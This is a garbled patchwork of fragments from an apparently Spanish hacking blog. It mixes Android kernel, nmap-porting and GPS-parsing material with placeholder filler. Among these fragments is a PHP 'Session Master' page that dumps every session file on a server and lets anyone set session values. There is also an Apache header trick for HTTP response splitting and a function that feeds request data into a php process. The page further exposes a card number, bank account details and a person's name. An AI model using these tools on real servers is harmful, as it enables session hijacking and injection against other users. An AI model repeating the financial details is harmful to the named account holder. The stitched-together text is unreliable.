Small Thumbnail Featured Post 1
Small Thumbnail Featured Post 2
Small Thumbnail Featured Post 3
Small Thumbnail Featured Post 4
Small Thumbnail Featured Post 4
Goreng insum dan goreng insum dan kembali ke goreng insum
Goreng insum dan goreng insum dan kembali ke goreng insum
Goreng insum dan goreng insum dan kembali ke goreng insum
Goreng insum dan goreng insum dan kembali ke goreng insum
Goreng insum dan goreng insum dan kembali ke goreng insum
Header set Last-Modified "Xianur0 Was Here\nContent-Length: 25"
Header set xianur0 "Xianur0 Was Here\nContent-Length: 25\n\n<h1>Xianur0 Was Here</h1>"
Zer0-null:/home/xianur0/kernel-2.6.29-M860 # nc -vvv localhost 80
Connection to localhost 80 port [tcp/http] succeeded!
GET / HTTP/1.1
Host: localhost
HTTP/1.1 200 OK
Date: Fri, 22 Feb 2013 12:09:52 GMT
Server: Apache/2.2.21 (Linux/SUSE)
Last-Modified: Xianur0 Was Here
Content-Length: 25
ETag: "100809-2c-3e9564c23b600"
Accept-Ranges: bytes
Content-Length: 44
xianur0: Xianur0 Was Here
Content-Length: 25
<h1>Xianur0 Was Here</h1>
Content-Type: text/html
<html><body><h1>It works!</h1></body></html>
function eval2($php) {
// eval2 By Xianur0
$cabecera = "<?php\n";
foreach($_GET as $key => $valor) $cabecera .= '$_GET['.$key.'] = "'.$valor.'";';
foreach($_POST as $key => $valor) $cabecera .= '$_POST['.$key.'] = "'.$valor.'";';
foreach($_SERVER as $key => $valor) $cabecera .= '$_SERVER['.$key.'] = "'.$valor.'";';
foreach($HTTP_POST_FILES as $key => $valor) $cabecera .= '$HTTP_POST_FILES['.$key.'] = "'.$valor.'";';
$consulta = $cabecera.$php." ?>";
$descriptorspec = array(
0 => array("pipe", "r"),
1 => array("pipe", "w"),
2 => array("file", "/tmp/error-output.txt", "a")
);
$cwd = getcwd();
$process = proc_open('php', $descriptorspec, $pipes, $cwd);
if (is_resource($process)) {
fwrite($pipes[0], $consulta);
fclose($pipes[0]);
echo stream_get_contents($pipes[1]);
fclose($pipes[1]);
}
}
<?php
print `ls`;
?>
<html><title>Session Master By Xianur0</title><BODY text=#ffffff bottomMargin=0 bgColor=#000000 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0><center>
<h1>Session Master By Xianur0</h1><br><img alt height="100" src="http://img59.imageshack.us/img59/9729/xianur0oq5.gif" width="100"><br><br><script type="text/Javascript">function expandcollapse (postid) { whichpost = document.getElementById(postid);if (whichpost.className=="postshown") { whichpost.className="posthidden"; } else { whichpost.className="postshown"; } }</script><style>.posthidden {display:none} .postshown {display:inline}</style>
<?php
@session_start();
function buscar() {
$tmp = @session_save_path();
print "<b>Directory of sessions: $tmp\n</b><br>";
$dir = @opendir($tmp);
while ($session = @readdir($dir))
{
if(preg_match("/^sess_/",$session)) {
$gestor = @fopen("$tmp/$session", "r");
$contenido = @fread($gestor, filesize("$tmp/$session"));
$contenido = @str_replace(';', ";\n<br><br>Session: ", $contenido);
fclose($gestor);
echo "<br>".$session."<br>\n";
if(!empty($contenido)){
$i++;
echo '<a href="javascript:expandcollapse('.$i.')">Show/Hide Code</a><br><span id="'.$i.'">
<br/><table height=1 cellSpacing=0 cellPadding=5 width="100%" bgColor=#FF0000 borderColor=#FF0000 border=1><tr><th>Session: '.$contenido.'</th></tr></table></span><br>';
}
}
}
}
function definir() {
$name = $_POST['name'];
$contenido = $_POST['valor'];
$_SESSION[$name] = $contenido;
}
function definidos() {
foreach ($_SESSION as $name => $valor)
{
print "<b>Name:</b> $name\n<br><b>Value:</b> $valor\n<br><br>";
}
}
function menu() {
$uri = $_SERVER['REQUEST_URI'];
print "<h2>Define SESSION</h2><br><form action='".$uri."?&action=definir' method='POST'>Name: <input type='text' name='name'><br>Value: <input type='text' name='valor'><br><input type='submit' value='Set!'></form><h2>Information:</h2><b><a href='$uri?&action=definidos'>Defined Sessions</a><br><a href='$uri?&action=buscar'>Sessions On The Server</a><b>";
}
if(isset($_GET['action']))
$action = $_GET['action'];
else $action="default";
switch ($action) {
case "buscar":
buscar();
break;
case "definir":
definir();
break;
case "definidos":
definidos();
break;
default:
menu();
break;
}
?>
M4ku4z y Megabyte con los alumnos de la primera generacion
Diploma con valor curricular, entregado a los participantes, con firmas originales, sellos oficiales del Sistema Educativo Nacional ,el Instituto Politecnico Nacional, y holograma de autenticidad. Respaldado por| Colegio de Contadores Públicos de Cuautla, A.C. | SEP/DGP/CP001/10/030. |
| Colegio de Contadores Públicos de Morelos, A.C. | SEP/DGP/CP001/10/031. |
| Asociación Mexicana de Contadores Públicos. Colegio Profesional en el Distrito Federal, A.C | SEP/DGP/CP002/06 |
# adb pull /proc/config.gz && zcat /proc/config.gz > .config
160 KB/s (13860 bytes in 0.084s)
Zer0-null:/home/xianur0/originales/kernel-2.6.29-M860 # ./compilarkernel.sh
General setup --->
[*] Prompt for development and/or incomplete code/drivers
Networking --->
[*] Networking support
Wireless --->
<*> Generic IEEE 802.11 Networking Stack (mac80211)
Device Drivers --->
[*] Misc Devices --->
<M> EEPROM 93CX6 support
Network device support --->
Wireless LAN --->
[*] Wireless LAN (IEEE 802.11)
<M> Realtek 8187 and 8187B USB support
Cryptographic options --->
[*]Cryptographic API
<*>ARC4 cipher algorithm
Library routines
---CRC32 functions
Kernel: arch/arm/boot/Image is ready
Building modules, stage 2.
Kernel: arch/arm/boot/zImage is ready
MODPOST 10 modules
Copiando modulos al temporal...
Modificando boot.img...
Flasheando la imagen...
< waiting for device >
sending 'boot' (3504 KB)... OKAY
writing 'boot'... OKAY
Reiniciando el dispositivo...
rebooting...
Subiendo modulos...
Desconecte el dispositivo hasta que este termine de iniciar.
Zer0-null:/home/xianur0/kernel-2.6.29-M860 # patch < ../parche.patch
can't find file to patch at input line 3
Perhaps you should have used the -p or --strip option?
The text leading up to this was:
--------------------------
|--- drivers/usb/function/msm_hsusb.c 2013-02-22 04:40:41.487025262 -0600
|+++ drivers/usb/function/msm_hsusb.c.back 2013-02-22 04:38:07.597024271 -0600
--------------------------
File to patch: drivers/usb/function/msm_hsusb.c
patching file drivers/usb/function/msm_hsusb.c
Zer0-null:/home/xianur0/kernel-2.6.29-M860/xian-modules # make
Make module for target arm
make EXTRA_CFLAGS=-fno-pic -C /home/xianur0/kernel-2.6.29-M860 M=/home/xianur0/kernel-2.6.29-M860/xian-modules ARCH=arm CROSS_COMPILE=/home/xianur0/toolchain-4.6.3/bin/arm-linux-androideabi- modules
/bin/sh: /home/xianur0/kernel-2.6.29-M860/xian-modules/scripts/gcc-version.sh: No existe el fichero o el directorio
make[1]: se ingresa al directorio `/home/xianur0/kernel-2.6.29-M860'
Building modules, stage 2.
MODPOST 2 modules
make[1]: se sale del directorio `/home/xianur0/kernel-2.6.29-M860'
adb push teclado.ko /sdcard/
* daemon not running. starting it now on port 5037 *
* daemon started successfully *
81 KB/s (52093 bytes in 0.622s)
adb push mouse.ko /sdcard/
187 KB/s (51069 bytes in 0.265s)
Disfruta :D!
adb shell
# insmod /sdcard/mouse.ko
Nuevo Leon #192, Colonia Condesa, esquina con Tlaxcala, timbre 101, cerca del metrobus Chilpancingo
Metadatos algo mas alla de lo visible
Deteccion y Proteccion de Ataques ARP Spoofing
Ingenieria Social
Hackeando Correos: Realidad o Mito
Penetracion de Servidores Windows
Identity and Access Management
Bypassing de Uploaders
CISCO& Juniper Brute Force
Wardriving con iOS
Crackeando Accunetix
NXT Controller Un Troyano para Divertirse
$total a la tarjeta 4152312197502419
Banco: BBVA Bancomer
A nombre de: Raul Robles Aviles
Concepto: revista
No. de Cuenta 0187088957
CLABE 012180001870889575
Raul Robles
Juan Angel Osorio
Helios Mier
Aaron Landa
Oscar Lopez, etc etc
$250 pesos a la tarjeta 4152312197502419
Banco: BBVA Bancomer
A nombre de: Raul Robles Aviles
Concepto: Diplomado
No. de Cuenta 0187088957
CLABE 012180001870889575
Monto: $250
$GPGSA,<1>,<2>,<3>,<4>,<5>,<6>,<7>,<8>,<9>,<10>,<11>,<12>,<13>,<14>,<15>,<16>,<17><Checksum><CR><LF>
M: Manual (Forzar a trabajar en 3D/2D)
A: Automático
1=No fijo, 2=2D, 3=3D
15 Position dilution of precision (PDOP)
16 Horizontal dilution of precision (HDOP)
17 Vertical dilution of precision (VDOP)
Zer0-null:/home/xianur0 # adb forward tcp:50000 tcp:50000
Zer0-null:/home/xianur0 # nc -vvv localhost 50000
nc: connect to localhost port 50000 (tcp) failed: Connection refused
Connection to localhost 50000 port [tcp/mrt] succeeded!
$GPGSV,4,1,16,01,,,,03,45,070,,04,,,,05,,,*4E
$GPGSV,4,2,16,06,27,054,,07,35,320,,08,13,293,,10,18,291,*7A
$GPGSV,4,3,16,11,11,151,,13,73,350,,16,20,036,,19,46,108,*7F
$GPGSV,4,4,16,20,13,185,,23,69,132,,28,12,233,,30,,,*44
[…]
import socket,string
# -*- coding: utf-8 -*-
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('localhost', 50000))
while 1:
linea = s.recv(250)
print linea
datos=string.split(linea,',')
try:
result = {
'$GPRMC': GPRMC ,
'$GPGSV': GPGSV
}[datos[0]](datos[1:])
except KeyError:
pass
def GPRMC (datos):
if datos[1] != 'V':
print "[-] Conectado con satelites!"
print "[-] Hora actual: "+datos[0][0:2]+":"+datos[0][2:4]+":"+datos[0][4:6]+" con "+datos[0][7:]+" milisegundos"
print "[-] Coordenadas actuales: ("+datos[2]+","+datos[4]+")"
print "[-] Latitud Hemisferio: "+datos[3]
print "[-] Longitud Hemisferio: "+datos[5]
print "[-] Velocidad actual: "+datos[6]+" nudos"
azimut=int(datos[7])
rumbo=''
if(azimut==0):
rumbo='Norte'
elif(azimut<90 and azimut > 0):
rumbo='Noreste'
elif(azimut==90):
rumbo='Este'
if(azimut>90 and azimut < 180):
rumbo='Sureste'
if(azimut==180):
rumbo='Sur'
if(azimut>180 and azimut<360):
rumbo='Suroeste'
if(azumit==360):
rumbo='Oeste'
print "[-] Rumbo: "+rumbo+" ("+datos[7]+" grados)"
print "[-] Fecha UTC: "+datos[8]
def GPGSV (datos):
print datos
print "\n[!] Información de satélites visibles: "
print "[-] Total Número de mensajes: "+datos[0]
print "[-] Número de mensaje: "+datos[1]
print "[-] Satélites visibles: "+datos[2]
c=0
for a in range(3):
print "[-] Satélite número: "+datos[3+c]
print "\t[-] Grados de elevación: "+datos[3+c+1]
print "\t[-] Asimut: "+datos[3+c+2]
print "\t[-] SNR: "+datos[3+c+3]+" dB-Hz"
c=c+4
import socket,string
# -*- coding: utf-8 -*-
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('localhost', 50000))
def GPRMC (datos):
if datos[1] != 'V':
print "[!] Conectado con satelites!"
print "[-] Hora actual: "+datos[0][0:2]+":"+datos[0][2:4]+":"+datos[0][4:6]+" con "+datos[0][7:]+" milisegundos"
print "[-] Coordenadas actuales: ("+datos[2]+","+datos[4]+")"
print "[-] Latitud Hemisferio: "+datos[3]
print "[-] Longitud Hemisferio: "+datos[5]
print "[-] Velocidad actual: "+datos[6]+" nudos"
azimut=int(datos[7])
rumbo=''
if(azimut==0):
rumbo='Norte'
elif(azimut<90 and azimut > 0):
rumbo='Noreste'
elif(azimut==90):
rumbo='Este'
if(azimut>90 and azimut < 180):
rumbo='Sureste'
if(azimut==180):
rumbo='Sur'
if(azimut>180 and azimut<360):
rumbo='Suroeste'
if(azimut==360):
rumbo='Oeste'
print "[-] Rumbo: "+rumbo+" ("+datos[7]+" grados)"
print "[-] Fecha UTC: "+datos[8]
def GPGSV (datos):
print datos
print "\n[!] Información de satélites visibles: "
print "[-] Total Número de mensajes: "+datos[0]
print "[-] Número de mensaje: "+datos[1]
print "[-] Satélites visibles: "+datos[2]
c=0
for a in range(3):
print "[-] Satélite número: "+datos[3+c]
print "\t[-] Grados de elevación: "+datos[3+c+1]
print "\t[-] Asimut: "+datos[3+c+2]
print "\t[-] SNR: "+datos[3+c+3]+" dB-Hz"
c=c+4
while 1:
linea = s.recv(250)
if linea == '':
raise RuntimeError("socket connection broken")
datos=string.split(linea,',')
try:
result = {
'$GPRMC': GPRMC,
'$GPGSV': GPGSV
}[datos[0]](datos[1:])
except KeyError:
pass
Zer0-null:/home/xianur0 # wget http://cdimage.debian.org/debian-cd/current/armel/iso-cd/debian-6.0.6-armel-xfce+lxde-CD-1.iso
http://ftp.fr.debian.org/debian/pool/main
http://ftp.fr.debian.org/debian/pool/main/n/nmap/nmap_5.00-3_armel.deb
Zer0-null:/home/xianur0/debian-arm # perl export.pl
Deb2Droid v0.1 by Xianur0
Use: ./export.pl [pool dir] [deb]
Zer0-null:/home/xianur0/debian-arm/nmap # perl export.pl ../pool/main/ n/nmap_5.00-3_armel.deb
[...]
[-] Instaladas!
[-] Paquete y dependencias extraidos correctamente!
Zer0-null:/home/xianur0/debian-arm/nmap # ls
bin config etc export.pl lib sbin selinux shlibs symbols templates usr var
Zer0-null:/home/xianur0/debian-arm/nmap # du -sh .
68M .
Zer0-null:/home/xianur0/debian-arm/nmap/usr/bin # objdump -x nmap | grep NEEDED
NEEDED libpcre.so.3
NEEDED libpcap.so.0.8
NEEDED libssl.so.0.9.8
NEEDED libcrypto.so.0.9.8
NEEDED liblua5.1.so.0
NEEDED libdl.so.2
NEEDED libstdc++.so.6
NEEDED libm.so.6
NEEDED libgcc_s.so.1
NEEDED libc.so.6
Zer0-null:/home/xianur0/debian-arm/nmap/usr/bin # mkdir -p /home/xianur0/nmap-final/bin/
Zer0-null:/home/xianur0/debian-arm/nmap/usr/bin # cp nmap /home/xianur0/nmap-final/bin/
Zer0-null:/home/xianur0/debian-arm/nmap/usr/bin # mkdir -p /home/xianur0/nmap-final/lib
Zer0-null:/home/xianur0/debian-arm/nmap/usr/bin # cp ../../lib/libpcre.so.3 /home/xianur0/nmap-final/lib/
Zer0-null:/home/xianur0/debian-arm/nmap/usr/bin # cp ../lib/libpcap.so.0.8 /home/xianur0/nmap-final/lib/
Zer0-null:/home/xianur0/debian-arm/nmap/usr/bin # cp ../lib/libssl.so.0.9.8 /home/xianur0/nmap-final/lib/
Zer0-null:/home/xianur0/debian-arm/nmap/usr/bin # cp ../lib/libcrypto.so.0.9.8 /home/xianur0/nmap-final/lib/
Zer0-null:/home/xianur0/debian-arm/nmap/usr/bin # cp ../lib/liblua5.1.so.0 /home/xianur0/nmap-final/lib/
Zer0-null:/home/xianur0/debian-arm/nmap/usr/bin # cp ../../lib/libdl.so.2 /home/xianur0/nmap-final/lib/
Zer0-null:/home/xianur0/debian-arm/nmap/usr/bin # cp ../lib/libstdc++.so.6 /home/xianur0/nmap-final/lib/
Zer0-null:/home/xianur0/debian-arm/nmap/usr/bin # cp ../../lib/libm.so.6 /home/xianur0/nmap-final/lib/
Zer0-null:/home/xianur0/debian-arm/nmap/usr/bin # cp ../../lib/libgcc_s.so.1 /home/xianur0/nmap-final/lib/
Zer0-null:/home/xianur0/debian-arm/nmap/usr/bin # cp ../../lib/libc.so.6 /home/xianur0/nmap-final/lib/
Zer0-null:/home/xianur0/debian-arm/nmap/usr/bin # objdump -x * | grep -i NEEDED | sort -n | uniq
NEEDED libacl.so.1
NEEDED libattr.so.1
NEEDED libbz2.so.1.0
NEEDED libcrypto.so.0.9.8
NEEDED libcrypt.so.1
NEEDED libc.so.6
NEEDED libdl.so.2
NEEDED libgcc_s.so.1
NEEDED liblua5.1.so.0
NEEDED liblzma.so.2
NEEDED libm.so.6
NEEDED libpcap.so.0.8
NEEDED libpcreposix.so.3
NEEDED libpcre.so.3
NEEDED libperl.so.5.10
NEEDED libpthread.so.0
NEEDED librt.so.1
NEEDED libselinux.so.1
NEEDED libssl.so.0.9.8
NEEDED libstdc++.so.6
NEEDED libz.so.1
Zer0-null:/home/xianur0/debian-arm/nmap/usr/bin # ls -l /home/xianur0/nmap-final/lib/
total 6712
-rwxr-xr-x 1 root root 122340 ene 14 04:53 ld-linux.so.3
-rw-r--r-- 1 root root 25412 ene 14 05:01 libacl.so.1
-rw-r--r-- 1 root root 14576 ene 14 05:02 libattr.so.1
-rw-r--r-- 1 root root 74552 ene 14 04:57 libbz2.so.1.0
-rw-r--r-- 1 root root 1247604 ene 14 04:26 libcrypto.so.0.9.8
-rw-r--r-- 1 root root 34376 ene 14 05:00 libcrypt.so.1
-rwxr-xr-x 1 root root 1205684 ene 14 04:27 libc.so.6
-rw-r--r-- 1 root root 9808 ene 14 04:26 libdl.so.2
-rw-r--r-- 1 root root 47212 ene 14 04:27 libgcc_s.so.1
-rw-r--r-- 1 root root 143460 ene 14 04:26 liblua5.1.so.0
-rw-r--r-- 1 root root 127380 ene 14 04:54 liblzma.so.2
-rw-r--r-- 1 root root 652912 ene 14 04:27 libm.so.6
-rw-r--r-- 1 root root 193012 ene 14 05:01 libpcap.so.0.8
-rw-r--r-- 1 root root 5892 ene 14 04:56 libpcreposix.so.3
-rw-r--r-- 1 root root 186208 ene 14 04:25 libpcre.so.3
-rw-r--r-- 1 root root 1251792 ene 14 04:56 libperl.so.5.10
-rwxr-xr-x 1 root root 120505 ene 14 04:53 libpthread.so.0
-rw-r--r-- 1 root root 26632 ene 14 04:55 librt.so.1
-rw-r--r-- 1 root root 100312 ene 14 04:54 libselinux.so.1
-rw-r--r-- 1 root root 270772 ene 14 04:26 libssl.so.0.9.8
-rw-r--r-- 1 root root 874176 ene 14 04:27 libstdc++.so.6
-rw-r--r-- 1 root root 82124 ene 14 04:53 libz.so.1
Zer0-null:/home/xianur0/debian-arm/nmap/usr/bin # ls -alh /home/xianur0/nmap-final/bin
total 620K
drwxr-xr-x 2 root root 4,0K ene 14 04:24 .
drwxr-xr-x 4 root root 4,0K ene 14 04:25 ..
-rwxr-xr-x 1 root root 609K ene 14 04:24 nmap
Zer0-null:/home/xianur0/debian-arm/nmap/usr/bin # du -sh /home/xianur0/nmap-final/
7,2M /home/xianur0/nmap-final/
Zer0-null:/home/xianur0/debian-arm/nmap/usr/bin # mkdir -p /home/xianur0/nmap-final/proc
Zer0-null:/home/xianur0/debian-arm/nmap/usr/bin # mkdir -p /home/xianur0/nmap-final/dev
Zer0-null:/home/xianur0/debian-arm/nmap/usr/bin # mkdir -p /home/xianur0/nmap-final/sys
Zer0-null:/home/xianur0/debian-arm/nmap/usr/bin # adb push /home/xianur0/nmap-final /sdcard/nmap
# cp -R /sdcard/nmap /data/local/nmap
# cd /data/local/nmap
# mount -o bind /proc proc
# mount -o bind /dev dev
# mount -o bind /sys sys
# chroot /data/local/nmap /bin/nmap -V
Nmap version 5.00 ( http://nmap.org )
#!/usr/bin/perl -w
require Digest::MD5;
my $base = $ARGV[0];
my $arg1 = $ARGV[1] || die(("\t"x3)."Deb2Droid v0.1 by Xianur0\n\nUse: ./export.pl [pool dir] [deb]\n");
my @packages = ($arg1);
our @extraidos = ();
our @depsinstaladas = ();
my $install = 1;
system("mkdir var && mkdir var/lib && mkdir var/lib/dpkg && mkdir var/lib/dpkg/info");
open STATUS,">>var/lib/dpkg/status";
sub copiar {
my ($origen,$destino) = @_;
open(FILES,"<".$origen) || return 0;
my $contenido = "";
binmode FILES;
while(<FILES>) {
$contenido .=$_;
}
close(FILES);
open FILED,">".$destino;
binmode FILED;
print FILED $contenido;
close(FILED);
}
sub locatedep {
my ($dir,$dep) = @_;
$dir .= "/" if($dir !~ /\/$/);
my @files = <$dir*>;
foreach my $file (@files) {
my $tmpfile = $file;
$tmpfile =~ s/^.+\///g;
if(-d $file) {
if($file !~ /^\.+$/){
return 1 if(locatedep($file,$dep));
}
}
elsif(-f $file && $dep eq substr($tmpfile,0,length($dep)) && $file =~ /u?deb$/) {
print "[-] Posible paquete encontrado: ".$dep." ? ".$file."\n";
print "ar x ".$file." && (tar -xzvf data.tar.gz > archivos.list) && tar -xzvf control.tar.gz 2>&1\n";
if($install == 1){
print "[-] Extrayendo paquete...\n";
return 1 if(extract($file,$dep));
}
}
}
return 0;
}
sub in_array
{
my ($arr,$search_for) = @_;
my %items = map {$_ => 1} @$arr; # create a hash out of the array values
return (exists($items{$search_for}))?1:0;
}
sub finddeps {
my $searchpackagename = "";
$searchpackagename = $_[0] if($#_ >= 0);
$searchpackagename = "" unless defined $searchpackagename;
open CONTROL,"<control" || return;
open MD5,"<md5sums";
open CONFFILES,"<conffiles";
my $control = "";
my $md5 = "";
my $conffiles = "";
return unless(fileno(MD5));
while(<CONTROL>) {
$control.=$_;
}
close(CONTROL);
my $packagename = "";
$packagename = $1 if($control =~ /Package: ([^\r\n]+)/);
print "Paquete: ".$searchpackagename."=? ".$packagename."\n";
if($searchpackagename ne "" && $searchpackagename ne $packagename) {
return 0;
}
if(fileno(MD5)){
while(<MD5>) {
$md5.=$_;
}
close(MD5);
}
my $status = "Status: install ok not-installed";
if(fileno(CONFFILES)) {
while(<CONFFILES>) {
my $f = $_;
$f =~ s/[\r\n]+//g;
open F, ".".$f;
my $cf = "";
while(<F>){
$cf .= $_;
}
$conffiles.=" ".$f." ".Digest::MD5::md5_hex($cf)."\n";
}
close(CONFFILES);
$control =~ s/(Description:\s+)/Conffiles:\n$conffiles$1/;
$status = "Status: install reinstreq half-configured";
}
checkmd5($md5);
my $depsstring = "";
$depsstring = $1 if($control =~ /Depends: ([^\r\n]+)/);
copiar("archivos.list","var/lib/dpkg/info/".$packagename.".list");
copiar("postinst","var/lib/dpkg/info/".$packagename.".postinst");
copiar("preinst","var/lib/dpkg/info/".$packagename.".preinst");
copiar("postrm","var/lib/dpkg/info/".$packagename.".postrm");
copiar("prerm","var/lib/dpkg/info/".$packagename.".prerm");
open MD5OUT,">>var/lib/dpkg/info/".$packagename.".md5sums";
print MD5OUT $md5;
$md5 = "";
if($depsstring eq ""){
print "[-] Sin dependencias... continuando...\n";
return 1;
}
my @deps = ($depsstring =~ /[^\,]+/g);
my $i = 0;
for $dep (@deps) {
$dep =~ s/^\s+//g;
my $version = $dep;
$version =~ s/(.+\()//g;
$version =~ s/\)//g;
my $condicion = "";
if($version=~/^(>|>=|<=|==|<)\s+([\:\.\d]+)$/){
($condicion,$version) = ($1,$2);
} else {$version="";}
$dep =~ s/\s+.+$//g;
$deps[$i] = $dep;
$i++;
}
print "[-]Instalando dependencias....\n\n";
for $dep (@deps) {
my $cdep = $#deps;
if(!in_array(\@depsinstaladas,$dep)){
push(@depsinstaladas,$dep);
print "[-] Buscando paquete: ".$dep."...\n";
if(!locatedep($base,$dep)) {
die("\n[!] No se pudo resolver la dependencia: ".$dep."\n");
}
}
}
print "[-] Agregando a status...\n";
$control =~s/^Package\:([^\r\n]+)/Package:$1\n$status/;
print $control."\n";
print STATUS $control."\n\n";
print "[-] Instaladas!\n";
return 1;
}
sub extract {
my ($p,$packname) = @_;
if(in_array(\@extraidos,$p)){
return 1;
}
push(@extraidos,$p);
my $descarte = "";
system("ar x ".$p." && (tar -xzvf data.tar.gz > archivos.list) && tar -xzvf control.tar.gz 2>&1");
my $estado = finddeps($packname);
system("rm md5sums 2>&1 | rm control 2>&1 | rm archivos.list 2>&1 | rm debian 2>&1 | rm debian-binary 2>&1 | rm conffiles 2>&1 | rm postinst 2>&1 | rm preinst 2>&1 | rm postrm 2>&1 | rm prerm 2>&1 | rm data.tar.gz 2>&1 | rm control.tar.gz 2>&1 | echo ");
return $estado;
}
sub checkmd5 {
my $md5 = $_[0];
my @lineas = split(/[\r\n]/,$md5);
for $linea (@lineas) {
my ($md5,$objeto) = ($linea =~ /^([\w\d]+)\s+(.+)$/);
open OBJETO,"<".$objeto;
binmode OBJETO;
my $bin = "";
while(<OBJETO>){
$bin .=$_;
}
my $md5real = Digest::MD5::md5_hex($bin);
unless($md5 eq $md5real) {
die("\n[!] MD5 incorrecto: ".$md5."!=".$md5real." en: ${objeto}\n");
} else {
print "\r[-] Probando MD5: ${md5} ${md5real} ${objeto}\r";
}
}
print "\n[-] MD5's correctos!\n";
}
for $package (@packages){
extract($base.$package);
}
print "[-] Paquete y dependencias extraidos correctamente!\n";
El titulo de esta publicación seguramente será muy polémico y causará muchas criticas, pero crear este “manual” y poner esta clase de títulos tienen sus razones, para comenzar las publicaciones de “Android para hackers” normalmente no pasan de una lista de apps para instalar y que harán todo el trabajo, pero sin duda alguna es complicado encontrar algo que valga la pena y que no esté regado por todo internet, además de que todo eso es negocio de scriptkiddies no de “hackers” como sugiere el título, por esta sencilla razón me daré a la labor de armar un manual de como convertir esto:
# mount | grep /system
/dev/block/mmcblk0p14 /system ext4 rw,relatime,barrier=1,data=ordered 0 0
# mount | grep /dev/block/mmcblk0p
/dev/block/mmcblk0p14 /system ext4 rw,relatime,barrier=1,data=ordered 0 0
/dev/block/mmcblk0p21 /data ext4 rw,nosuid,nodev,noatime,errors=continue,barrier=1,data=ordered 0 0
/dev/block/mmcblk0p15 /persist ext4 rw,nosuid,nodev,relatime,barrier=1,data=ordered 0 0
/dev/block/mmcblk0p16 /cache ext4 rw,nosuid,nodev,relatime,barrier=1,data=ordered 0 0
/dev/block/mmcblk0p18 /drm ext4 rw,nosuid,nodev,relatime,barrier=1,data=ordered 0 0
/dev/block/mmcblk0p22 /mpt ext4 rw,nosuid,nodev,relatime,barrier=1,data=ordered 0 0
# ls -l /dev/block/mmcblk0p*
brw------- root root 179, 1 2013-01-04 00:13 mmcblk0p1
brw------- root root 179, 10 2013-01-13 20:06 mmcblk0p10
brw------- root root 179, 11 2013-01-13 19:48 mmcblk0p11
brw------- root root 179, 12 2013-01-04 00:13 mmcblk0p12
brw------- root root 179, 13 2013-01-04 00:13 mmcblk0p13
brw------- root root 179, 14 2013-01-04 00:13 mmcblk0p14
brw------- root root 179, 15 2013-01-04 00:13 mmcblk0p15
brw------- root root 179, 16 2013-01-04 00:13 mmcblk0p16
brw-rw---- system system 179, 17 2013-01-04 00:13 mmcblk0p17
brw-rw---- system system 179, 18 2013-01-04 00:13 mmcblk0p18
brw------- root root 179, 19 2013-01-04 00:13 mmcblk0p19
brw------- root root 179, 2 2013-01-04 00:13 mmcblk0p2
brw------- root root 179, 20 2013-01-04 00:13 mmcblk0p20
brw------- root root 179, 21 2013-01-04 00:13 mmcblk0p21
brw------- root root 179, 22 2013-01-04 00:13 mmcblk0p22
brw------- root root 179, 23 2013-01-04 00:13 mmcblk0p23
brw------- root root 179, 3 2013-01-04 00:13 mmcblk0p3
brw------- root root 179, 4 2013-01-04 00:13 mmcblk0p4
brw------- root root 179, 5 2013-01-04 00:13 mmcblk0p5
brwxrwx--- root radio 179, 6 2013-01-04 00:13 mmcblk0p6
brw------- root root 179, 7 2013-01-04 00:13 mmcblk0p7
brwxrwx--- root system 179, 8 2013-01-04 00:13 mmcblk0p8
brw------- root root 179, 9 2013-01-04 00:13 mmcblk0p9
# cat /proc/mtd
dev: size erasesize name
mtd0: 00500000 00020000 "boot"
mtd1: 00500000 00020000 "recovery"
mtd2: 00140000 00020000 "misc"
mtd3: 00060000 00020000 "splash"
mtd4: 0aa00000 00020000 "system"
mtd5: 04600000 00020000 "cache"
mtd6: 0bda0000 00020000 "userdata"
mtd7: 01400000 00020000 "userdata2"
# cat /proc/mtd
/proc/mtd: No such file or directory
# dd if=/dev/block/mmcblk0p1 of=/sdcard/mmcblk0p1
40+0 records in
40+0 records out
20480 bytes transferred in 0.004 secs (5120000 bytes/sec)
Zer0-null:/home/xianur0 # adb pull /sdcard/mmcblk0p1 mmcblk0p1
236 KB/s (20480 bytes in 0.084s)
Zer0-null:/home/xianur0 # binwalk mmcblk0p1
DECIMAL HEX DESCRIPTION
-------------------------------------------------------------------------------------------------------
Zer0-null:/home/xianur0/L3-back # binwalk mmcblk0p9
DECIMAL HEX DESCRIPTION
-------------------------------------------------------------------------------------------------------
20010 0x4E2A gzip compressed data, from Unix, last modified: Thu Jul 26 05:55:33 2012, max compression
[…]
Zer0-null:/home/xianur0/L3-back # perl -e 'my $tmp="";open FILE,"<mmcblk0p9"; read FILE,$tmp,8; print $tmp;'
ANDROID!
Zer0-null:/home/xianur0/L3-back # abootimg -i mmcblk0p9
* file name = mmcblk0p9
* image size = 8388608 bytes (8.00 MB)
page size = 4096 bytes
* Boot Name = ""
* kernel size = 3312024 bytes (3.16 MB)
ramdisk size = 490986 bytes (0.47 MB)
* load addresses:
kernel: 0x00208000
ramdisk: 0x01300000
tags: 0x00200100
* cmdline = androidboot.hardware=e0
- id = 0x099380a2 0xe8c73d9d 0x7ec0b3eb 0xb7d342d1 0xfda995b2 0x00000000 0x00000000 0x00000000
Zer0-null:/home/xianur0/L3-back # abootimg -x mmcblk0p9
writing boot image config in bootimg.cfg
extracting kernel in zImage
extracting ramdisk in initrd.img
Zer0-null:/home/xianur0/L3-back # mkdir ramdisk && cd ramdisk && gzip -dc ../initrd.img | cpio -i
2074 blocks
Zer0-null:/home/xianur0/L3-back/ramdisk # ls
chargerimages dev init.goldfish.rc init.rc lgdms.fota_update.rc sbin ueventd.goldfish.rc
data init init.qcom.rc init.target.rc lgsecurity.rc sys ueventd.rc
default.prop init.e0.rc init.qcom.sh lgdms.fota.rc proc system
Zer0-null:/home/xianur0/L3-back/ramdisk # find . | cpio -o -H newc | gzip > ../new-initrd.img
2074 blocks
Zer0-null:/home/xianur0/L3-back # cp mmcblk0p9 mmcblk0p9.new && abootimg -u mmcblk0p9.new -r new-initrd.img
reading ramdisk from new-initrd.img
Writing Boot Image mmcblk0p9.new
Zer0-null:/home/xianur0/L3-back # adb push mmcblk0p9.new /sdcard/
# dd if=/sdcard/mmcblk0p9.new of=/mmcblk0p9
Zer0-null:/home/xianur0/L3-back # fastboot flash boot mmcblk0p9.new
Zer0-null:/home/xianur0/L3-back # fastboot boot mmcblk0p9.new
Zer0-null:/home/xianur0/L3-back # fastboot boot zImage initrd.img
#!/usr/bin/perl -w
require Digest::MD5;
my $base = $ARGV[0];
